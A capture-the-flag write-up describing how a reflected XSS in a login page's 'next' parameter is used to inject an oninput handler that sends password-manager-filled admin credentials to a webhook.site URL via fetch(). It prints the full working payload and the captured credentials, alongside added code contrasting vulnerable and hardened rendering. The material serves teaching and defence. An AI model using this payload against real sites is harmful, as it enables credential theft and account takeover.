There is a website at `http://34.76.228.102:2003` that allows logging in with
any username and password, except for `admin`. The `admin` user's password is
required, and logging in as admin would give us the flag. The challenge text
says that the admin uses a password manager, so I assumed their credentials
would be filled in automatically when they open the login page.

The website itself lets you submit any URL, which the admin will then check for
security issues. I created a webhook using [webhook.site](https://webhook.site),
and it turns out that if I submit the webhook URL to the system, after a few
seconds I receive a request from that machine.

Examining the login page, I found that `?next=` is appended to its URL.
Anything we put into this parameter is reflected inside the `action` attribute
of the login form. This is a classic XSS vulnerability that we can exploit. We
can put almost anything there, but not `>`, as it is changed into `&gt;` on the
site, so we can only operate within the attributes of the `form` element: a
space ends the `action` value, and whatever follows is parsed as further
attributes of the form.

The idea for the payload is to put the webhook URL in the `action` attribute
and add an `oninput` event handler that sends the login and password as soon as
the password manager fills them in. Inside the handler `this` is the form
element, so `this.action` is the injected webhook URL and `this[0]` and
`this[1]` are its first two controls, the login and password fields. My initial
idea for this attribute was:

```  
oninput=fetch(this.action + this[0].value + `-` + this[1].value)  
```

but it turned out that `+` signs are stripped, so I tried an array with the
`join` method instead:

```  
oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))  
```

and it worked fine. The final payload I sent was:

```
http://34.76.228.102:2003/login?next=https://webhook.site/[my_webhook_guid]?c= oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))
```
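To make the two observations above concrete (the reflection of `next` into an unquoted `action` attribute, and the `+` that never reached the page), here is an added example in Node.js. It is not code from the challenge or from this write-up: the template shape, the escaping rules and the `/login` path are my reconstruction of what the server most likely did, and the webhook GUID is a placeholder. The first function mirrors how a server receives `next`: a bare `+` in a query string decodes to a space, which is why the `+`-based handler did not survive. The vulnerable renderer shows that entity-encoding only `<` and `>` does not stop attribute injection when the attribute is unquoted; the hardened renderer quotes and fully encodes the attribute and restricts `next` to a same-site path, which also closes the open redirect the same parameter would otherwise allow.

```javascript
// Added example (not part of the original write-up): reconstruction of how the
// login page probably handles `?next=`, beside a hardened version. Template
// shape, escaping rules and the /login path are assumptions for illustration.

const WEBHOOK = "https://webhook.site/00000000-0000-0000-0000-000000000000"; // placeholder GUID
const HANDLER = "oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))";
// The attack URL from the write-up, with the placeholder GUID substituted.
const ATTACK_URL = `http://34.76.228.102:2003/login?next=${WEBHOOK}?c= ${HANDLER}`;

// How the server sees `next`: percent-escapes are decoded and, in a query
// string, a literal `+` becomes a space. A `+` typed straight into the URL
// therefore never reaches the rendered attribute.
function nextParamAsServerSeesIt(requestUrl) {
  return new URL(requestUrl).searchParams.get("next") ?? "";
}

// Vulnerable rendering (assumed): only `<` and `>` are entity-encoded and the
// attribute value is written without quotes, so a space ends `action=` and the
// rest of `next` is parsed as additional attributes of the <form>.
function renderLoginVulnerable(next) {
  const weak = next.replace(/</g, "&lt;").replace(/>/g, "&gt;");
  return `<form method=post action=${weak}>` +
    `<input name=login><input name=password type=password>` +
    `<button>Login</button></form>`;
}

// Hardened rendering: `next` must be a same-site path (single leading "/", no
// scheme, no "//" or backslash), otherwise it falls back to "/". The attribute
// is quoted and every HTML-significant character is encoded, so no value can
// start a new attribute or element.
function safeNextPath(next) {
  return /^\/(?!\/)[^\s\\]*$/.test(next) ? next : "/";
}

function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

function renderLoginHardened(next) {
  const action = `/login?next=${encodeURIComponent(safeNextPath(next))}`;
  return `<form method="post" action="${escapeHtmlAttr(action)}">` +
    `<input name="login"><input name="password" type="password">` +
    `<button>Login</button></form>`;
}

// Check used below: does the rendered <form> tag carry an event-handler
// attribute that the template never intended to emit?
function formTagHasHandler(html) {
  const m = html.match(/<form\b[^>]*>/);
  return m ? /\son[a-z]+=/i.test(m[0]) : false;
}

const served = nextParamAsServerSeesIt(ATTACK_URL);
console.log("server sees next =", served);
console.log("vulnerable:", renderLoginVulnerable(served));
console.log("hardened:  ", renderLoginHardened(served));
```

Run with `node`: the vulnerable output carries the injected `oninput=` as a real attribute of the form, while the hardened output rejects the external URL and emits `action="/login?next=%2F"`.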

And after a couple of seconds I got a series of requests on my webhook
(`oninput` fires every time the password manager fills a field, so partial
values arrive first), with the last one containing the admin's full
credentials:

```  
admin-WxBkJjpgzAdPsEXr  
```

Logging in with these credentials displayed the flag:
`hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}`